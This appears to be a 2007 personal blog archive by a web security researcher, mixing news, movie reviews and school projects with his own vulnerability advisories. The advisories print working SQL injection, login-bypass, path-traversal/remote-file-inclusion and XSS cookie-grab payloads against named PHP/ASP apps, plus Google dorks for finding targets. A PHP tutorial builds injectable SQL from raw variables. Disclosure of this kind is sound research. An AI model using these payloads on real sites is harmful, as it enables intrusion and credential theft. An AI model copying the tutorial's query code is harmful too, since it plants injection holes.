14house dot blogspot dot com

Critical vulnerability in Quicktime 7.3

2007-11-27T08:26:00.000-08:00

USCert has issued a warning concerning a buffer overflow in the current version of Apple QuickTime. Attackers can manipulate content type headers in an RTSP data stream to cause a buffer overflow that allows malicious code to be injected into the system under attack. Users of Apple's iTunes multimedia software are also affected by the hole because the current version of QuickTime is installed on systems when iTunes is installed.

Demo programs that reportedly demonstrate the vulnerability have already popped up in the milw0rm archive. Until Apple releases a patch for this vulnerability, the only workaround for the playback of RTSP streams is to use other software or to restrict the use of streaming data via the firewall. Users are also advised to be careful with QuickTime Link files (.qtl), which can also reference RTSP sources. Apple released version 7.3 only a few weeks ago.

This vulnerability is also coliding with Windows Vista and giving an attacker permissions to control a remote machine.

Proof of concept: Here
Advisory from CERT: Here

CSRF on mobile phones

2007-11-23T02:01:00.001-08:00

Today I read an good article about using CSRF (Cross-site Request Forgery) on mobile phones. It uses the lack verification of sms limits on some phone services like ring tones, favorites, etc. It was posted on Bugtraq, but you can read more about this on the original website.

No. I'm not going to show you how to use Cross-Site Request Forgery (CSRF) in order to attack mobile phones while using a mobile phone to surf the web. Instead, I'm going to talk about how CSRF vulnerabilities can be used to cause denial-of-service attacks against mobile phones, by flooding the phone with SMS and service messages.

Mobile phone service providers in Israel, and throughout the world, provide a web interface to send SMS messages. Fortunately, they limit the SMS sending web interface to 20 messages per day, and they also require the user to login to their web site in order to send an SMS.

Unfortunately, at-least when referring to the Israeli providers, they also give attackers a way to send endless SMS and service messages without any kind of authentication and with a simple HTTP request. While this method doesn't allow to specify the message of the SMS, it does allow the attacker to specify the targeted phone number.

Full article

Mozilla fights for security in beta 3

2007-11-21T13:42:00.000-08:00

The Mozilla Foundation released on Monday a beta version of the group's latest open-source Firefox browser, rewriting parts of the code and enhancing security.

Firefox 3 Beta 1 adds anti-malware features to the browser, using a similar mechanism as the anti-phishing feature in Firefox 2, harnessing a Google-generated blacklist of sites that are hosting malicious code. The beta version of the browser also checks plugins to make sure they are compatible with the software and uses a secure download mechanism for updates.

In SecurityFocus

I actually use Opera browser, but I used mozilla for years, so if you want take a look at the mozilla beta 3 (here)

Some browser statistics links:
http://www.w3schools.com/browsers/default.asp
http://operawatch.com/news/2006/08/some-opera-statistics-2.html
http://en.wikipedia.org/wiki/Usage_share_of_web_browsers

DIM application

2007-11-06T03:39:00.000-08:00

I finished my school project about controling pharmaceutical sales representative in portuguese health centers or hospitals. It's coded in Visual Basic .NET and uses SQL server database support. Simple fast and secure, login credentials are controlled by stored procedures. You can see some screenshots here:

Screen 1
Screen 2
Screen 3
Screen 4

E-Smart Cart SQL Injection

2007-09-02T04:03:00.000-07:00

Software: E-Smart Card
Vendor link: http://www.hostnomi.com/cart.htm
Attack: SQL Injection (admin bypass)

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable file is embadmin/login.asp, and a malicious user can bypass administration login.

Proof of Concept:
embadmin/login.asp

user: 'or''='
pass: 'or''='

Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and waiting for reply.

PHPNS SQL Injection

2007-08-29T03:30:00.000-07:00

Software: phpns current version (v1.1)
Vendor link: http://phpns.com
Attack: SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variable is $nid and maybe others.

Proof of Concept:
/phpns/shownews.php?id=1'[SQL Injection]

Shows username : pass from userinfo
/phpns/shownews.php?id=1' union select all null,null,concat(char(117,115,101,114,110,97,109,101,58),
username,char(32,112,97,115,115,119,111,114,100,58),password),
null,null,null from userinfo/*

Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and replyed that they are fixing it.

Old school ascii artwork

2007-08-28T16:53:00.000-07:00

I know is kind of old, but this thing rules at all time. I first saw the star wars telnet ascii thing like 8/10 years ago and it still rox.

# For star wars
telnet towel.blinkenlights.nl

# For DOS chat room and some extras
telnet centralperk.us 2323

ACG News SQL Injection

2007-08-28T06:43:00.000-07:00

Software: ACG News 1.0
Vendor link: http://www.altercoder.com
Vendor Demo link: http://acgnews.uw.hu/index.php
Attack: SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variables are $aid and $catid on index.php file.

Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7

index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version

Solution:

Your script should filter metacharacters from user input.

Vendor (Liam Dawe) is already fixing all the problems that I found out, a few more were added by myself...

Proof Of Concept

SQL Injection:
printable.php?aid=-3%20UNION%20ALL%20SELECT%201,@@version
,3,4,5,user(),7

Mini mi

2007-08-27T08:18:00.000-07:00

He Pingping, 73cm, will use Bao Xishu, 2.36m, as weapon to take over the world :)

Airport security

2007-08-26T06:07:00.001-07:00

Owned! :)

PSP Shell

2007-08-25T03:19:00.000-07:00

Nothing is impossible right?

Total ownage! Give my credits to DarkRevenge

Arcadem RFI / SQL Injection flaws

2007-08-24T06:00:00.000-07:00

Arcadem Remote File Inclusion Flaw / SQL Injection

Software: Arcadem 2.01
Vendor link: http://agaresmedia.com
Attack: Remote File Inclusion / SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

Google dork:"Powered by AMCMS3"

Remote File Inclusion
---------------------
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver.

Proof of Concept:

index.php?loadpage=../../../../file
index.php?loadpage=[evilscript]

Solution:

Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list.

For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. It is recommended to disable this option from php.ini.

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Proof of Concept:

index.php?blockpage=%2E%2Findex%2Ephp
%3Fblockpage%3D1%26cat%3D&cat=[SQL Injection]
index.php?blockpage=%2E%2Findex%2Ephp
%3Fblockpage%3D1%26cat%3D&cat='

Solution:

Your script should filter metacharacters from user input.

Vendor contacted us with the following:
SmOk3,

Thanks for your input. We've verified that the Remote File Inclusion
flaw existed, and have patched that problem in Arcadem 2.02. We
definitely appreciate the heads up on that. The SQL Injection is not a
flaw, as all meta characters are stripped. If you try using the
blockpage?= to send use an SQL injection, you'll find that your query
will fail.

Cheers,
Jeff Quindlen
Agares Media
(509) 320-4216
sales@agaresmedia.com
http://www.agaresmedia.com

More info

Making mozilla faster

2007-08-17T17:20:00.000-07:00

1. Type "about:config" into the address bar
2. Set "network.http.pipelining" to "true"
3. Set "network.http.proxy.pipelining" to "true"
4. Set "network.http.pipelining.maxrequests" to 30

You should see some improvements on the your mozilla browser speed :)

Please don't hurt the web
use open standards

Daft Punk rox

2007-08-17T17:07:00.000-07:00

Ok it has Kanye West also, but... It's Daft Punk beat!

Movies review

2007-07-09T01:34:00.001-07:00

Shrek The Third: This movie disapoint me a little bit. Shrek movie became too comercial, and the funny parts are very exagerated. Nothing to fancy really...

IMDB rating 6.5/10

Prey: A horror/thriller movie where a family is lost in a Africa savana full of hungry lions. Its everything too obvious but the visual scenes are quite fine without any glitches.

IMDB rating 4.8/10

NoteWorks - text editor with addons

2007-07-06T01:57:00.000-07:00

I coded a simple html code editor in JAVA, still in development, to simplify some of my own code, and you can find some testing on php on tools menu. Currently is only available in portuguese but if all goes well, it will have also a english version.

Download

JAVA code snips - Part I

2007-06-27T03:12:00.000-07:00

I'm getting my first steps on JAVA at school so I started getting some addicional information on some fun stuff to put on my programms. After a few hours of reading some ebooks and net forums and was able to put some interesting code on my proggies.

/** Those confirmation popups for exiting your application */
int x = JOptionPane.showConfirmDialog(this, "Really want exit this application?" , "Title",JOptionPane.OK_CANCEL_OPTION,JOptionPane.QUESTION_MESSAGE);
if (x == 0)
{
System.exit(0);
}

Remember to -- > import javax.swing.*;

Girls are evil - the proof

2007-06-26T07:03:00.001-07:00

Any doubt?? :-)

Movies review

2007-06-26T01:36:00.000-07:00

Another of my hobbies is to watch movies. Every week, I'll try to post a review for every movie that I watch, starting today...

Fantastic Four - Rise of the Silver Surfer: Its a great movie, for me better than the first one. The appearing of Dr Doom, Silver Surfer and Galactus, make the movie more visual attractive and more appealing.

IMDB Rating: 6.6/10

Goal II - Living the Dream: Nice movie for people who like football. It's about a young mexican player who joins Real Madrid and at the same time, have trouble with his girlfriend and family. The best of the movie it's really the presence of almost all Real Madrid players like Robinho, Roberto Carlos, David Beckham, Ronaldo, etc... The football scenes are real matches of the team.

IMDB Rating: 6.0/10

MySQL 5 + PHP (connecting and instructing)

2007-06-20T02:36:00.000-07:00

With the new version of MySQL (version 5) new ways of connecting throw PHP is available, especially mysqli, that you can install that extension when you install or repair PHP installation.

mysqli:

$conn = mysqli_connect ($server,$username,$passwd,$bd);
$executar = mysqli_query ($conn,"insert into users (userid,passid,level) values ('$name','$pass','$level')");
mysqli_free_result($executar);
mysqli_close($conn);

You can also use code that work on any version, still using old sintaxe:

$sql = "INSERT INTO users (userid,passid,nivel) values ('$nome','$pass','$nivel')";
mysql_connect("localhost","convidado","1234");
$resultado = mysql_db_query("testes",$sql);

Hope it help... Tomorrow or so, I'll write some posts about MySQL Stored Procedures.

Google negative point on security?

2007-06-19T02:14:00.000-07:00

Google was the worst company regarding user privacy by Privacy International.
Almost everyone knows that Google stores every step you take online, recording every search you do. After that report, Google says that they will delete every record on each 18 / 24 months.

Well this is not good publicity for Google, but, Microsoft is doing this since their first operative system was out and people still use it... :-)

Thatvideosite.com

2007-05-18T03:02:00.000-07:00

I found a huge video hosting site, like youtube, but this one you can click a link and download the file if you want to. They have lot's of videos and take a look into the "Family Guy" section.

Also you can upload your videos to there.

Thatvideosite.com

World Trade Center Conspiracy

2007-05-13T09:43:00.000-07:00

I seen a lot of videos talking about the WTC conspirary, but this one is on the best explaining the facts...

Take a look into it and comment that if you like...

New Harry Potter (Southpark version)

2007-05-13T09:15:00.000-07:00

PHP Underground Security

2007-05-11T15:42:00.000-07:00

It's not very recent, but it's a simple basic introduction to PHP security. It talks about few basics security flaws on PHP scripting (XSS, RFI, SQL Injection and others) and how can a programmer prevent some of that flaws. Check it out.

You can read the full article here.

hackits.de

2007-05-10T03:01:00.000-07:00

Long time I didn´t post any post on my blog, maybe because I don't have too much time or just because I'm kind of a lazy fellow :)

This post is not to excuse myself about anything, not many people visit this, but to express my opinion on a "new" website I found with great challenges - http://www.hackits.de . There you can find programming challenges, criptography, stenography, programming, javascript, php, vbscrit, java and a lot more, where you can rank yourself up to the top 500 (21000 registered members at the time).

Also you can get great support in the hackits forum, in irc channel #hackits.de @ irc.quakenet.org or you can PM me in the game (ingame: suntzu).

PS: I'll try to be more active in this blog, I said TRY ;)

FreeWebShop.org Remote File Inclusion Flaw

2007-01-23T12:35:00.000-08:00

FreeWebShop.org Remote File Inclusion Flaw

Software: FreeWebshop.org v2.2.4
Vendor link: http://www.freewebshop.org // info@freewebshop.org
Attack: Remote File Inclusion

Discovered by: David Sopas Ferreira a.k.a SmOk3 smok3f00 at gmail.com

Google dork:"Powered by FreeWebshop.org"

Vulnerable Code:

-- /includes/login.php --

(...) line 38
include ($lang_file);
(...)

Proof of Concept:

/includes/login.php?lang_file=../../../../../../etc/hosts
/includes/login.php?lang_file=[evilscript]

Solution:
http://www.freewebshop.org/?id=36

All my security advisories

2007-01-23T03:55:00.000-08:00

Today, I spent some time to gather all my security advisories so far.

Open Solution Quick.Cart Index.PHP Cross-Site Scripting Vulnerability : 2007-01-12
URL: http://www.securityfocus.com/bid/21971

Fastilo Index.PHP Cross-Site Scripting Vulnerability : 2007-01-11
URL: http://www.securityfocus.com/bid/22007

Mall23 AddItem.ASP SQL Injection Vulnerability : 2005-09-21
URL: http://www.securityfocus.com/bid/14898

phpBB 2.0.17 remote avatar size bug : 2005-09-20
URL: http://www.securityfocus.com/archive/1/411229

MX Shop Index.PHP Multiple SQL Injection Vulnerabilities: 2005-09-19
URL: http://www.securityfocus.com/bid/14876

NooToplist Index.PHP Multiple SQL Injection Vulnerabilities : 2005-09-19
URL: http://www.securityfocus.com/bid/14873

Mall23 Infopage.ASP SQL Injection Vulnerability : 2005-09-12
URL: http://www.securityfocus.com/bid/14803

Emefa Guestbook Multiple HTML Injection Vulnerabilities : 2005-08-18
URL: http://www.securityfocus.com/bid/14599

MidiCart ASP Shopping Cart Cross-Site Scripting and SQL Injection : 2005-08-11
URL: http://secunia.com/advisories/16377/

Pinnacle Cart Index.PHP Cross-Site Scripting Vulnerability : 2005-04-11
URL: http://www.securityfocus.com/bid/13138

VoteBox Votebox.PHP Remote File Include Vulnerability : 2005-03-13
URL: http://www.securityfocus.com/bid/12806

SunShop Shopping Cart Cross-Site Scripting Vulnerability : 2005-02-02
URL: http://www.securityfocus.com/bid/12438

JShop E-Commerce Suite Product.PHP Cross-Site Scripting Vulnerability : 2005-01-30
URL: http://www.securityfocus.com/bid/12403

Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities : 2005-01-26
URL: http://www.securityfocus.com/bid/12382

MPM Guestbook Header Input Validation Vulnerability : 2005-01-13
URL: http://www.securityfocus.com/bid/12266

Guestserver Path Disclosure Vulnerability : 2005-01-10
URL: http://www.securityfocus.com/bid/12230

Guestserver HTML Injection Vulnerability : 2005-01-10
URL: http://www.securityfocus.com/bid/12232

PHP-Nuke Search Box Cross-Site Scripting Vulnerabilities 2004-08-11
URL: http://secunia.com/advisories/12271/

e107 Website System Multiple Script HTML Injection Vulnerability : 2004-05-05
URL: http://www.securityfocus.com/bid/10293

SillySearch "search" Parameter Cross Site Scripting Vulnerability : 2004-03-31
URL: http://secunia.com/advisories/11260/

IGeneric Free Shopping Cart SQL Injection Vulnerability : 2004-02-29
URL: http://www.securityfocus.com/bid/9771

IGeneric Free Shopping Cart Cross-Site Scripting Vulnerability : 2004-02-29
URL: http://www.securityfocus.com/bid/9773

Ecommerce Corporation Online Store Kit More.PHP Multiple Vulnerabilities : 2004-02-16
URL: http://www.securityfocus.com/bid/9676

phpWebSite SQL Injection Vulnerabilities : 2004-02-16
URL: http://secunia.com/advisories/10878/

JShop E-Commerce Suite xSearch Cross-Site Scripting Vulnerability : 2004-02-08
URL: http://www.securityfocus.com/bid/9609

Mambo Open Source Itemid Parameter Cross-Site Scripting Vulnerability : 2004-02-04
URL: http://www.securityfocus.com/bid/9588

FreznoShop "search.php" Cross-Site Scripting Vulnerability : 2004-01-06
URL: http://secunia.com/advisories/10547/

Private Message System Cross-Site Scripting Vulnerability : 2003-12-29
URL: http://secunia.com/advisories/10501/

PHPCatalog ID Parameter SQL Injection Vulnerability : 2003-12-28
URL: http://www.securityfocus.com/bid/9318

My Little Forum Cross-Site Scripting Vulnerabilities : 2003-12-23
URL: http://secunia.com/advisories/10489/

BN Soft BoastMachine Comment Form HTML Injection Vulnerability : 2003-12-21
URL: http://www.securityfocus.com/bid/9270

Ben's Guestbook Comments Field Cross-Site Scripting Vulnerability : 2003-12-09
URL: http://secunia.com/advisories/10394/

Justin Hagstrom Auto Directory Index Cross-Site Scripting Vulnerability : 2003-11-16
URL: http://www.securityfocus.com/bid/9056

PowerPortal Search Box Cross-Site Scripting Vulnerability : 2003-11-10
URL: http://secunia.com/advisories/10172/

OpenAutoClassifieds Listing Parameter Cross-Site Scripting Vulnerability : 2003-11-03
URL: http://www.securityfocus.com/bid/8972

MPM Guestbook "lng" Parameter Cross-Site Scripting Vulnerability : 2003-11-03
URL: http://secunia.com/advisories/10122/

Total: 36 advisories

How to hide a file on a jpeg

2007-01-23T01:21:00.000-08:00

This is kinda of old stuff, but it stills works and its very funny to hide some of
our private files. You only have to compress to a zip file or rar your private
information, then open cmd.exe and type the following:

copy /b yourpic.jpg + yourcompressfile.rar photograph.jpg

Open photograph with your image viewer. Yourpic.jpg right? Now, open with winrar.
Your compressed data :D

I'm writing a basic php tutorial, so in the next days I'll be away from my blog.

Cya!

Fastilo - Open Source Shopping Cart Vuln

2007-01-11T10:46:00.000-08:00

Fastilo is a open source shopping cart, based on PHP and SQL and it suffers from a cross site scripting vulnerability in the file index.php.

http://www.fastilo.com

This attack can be used by malicious users to grab users cookies or even perform phishing attacks on the system.

Proof of Concept: .../index.php?p="> < script > alert(document.cookie) < /script >

A possible solution is to filter out the variable for special chars and tags, this way will prevent most of the attacks.

by David Sopas aka SmOk3

Zone-h got defaced on Christmas

2007-01-09T03:02:00.000-08:00

Zone-h.org was defaced on Christmas by Cyber-Terrorist, and the problem was due to human error. The forensic is now publish on a zone-h post and seems like a simple hack like grabbing cookie from a hotmail xss bug can get you on defacing the biggest defacer mirror in the world.

You can see the explanation here:
http://www.zone-h.org/content/view/14458/31/

Mirror here:
http://www.zone-h.org/images/stories/december06/zone-h-defaced.jpg

What's 14 house?

2006-12-28T03:33:00.000-08:00

Hey, welcome to my personnal blog. Here I'll post my lastest work and news about my simple and monotony life. But, you must me asking yourself (or not), what's 14 house?

...
...
...
...

... my house number :)

Happy new year to all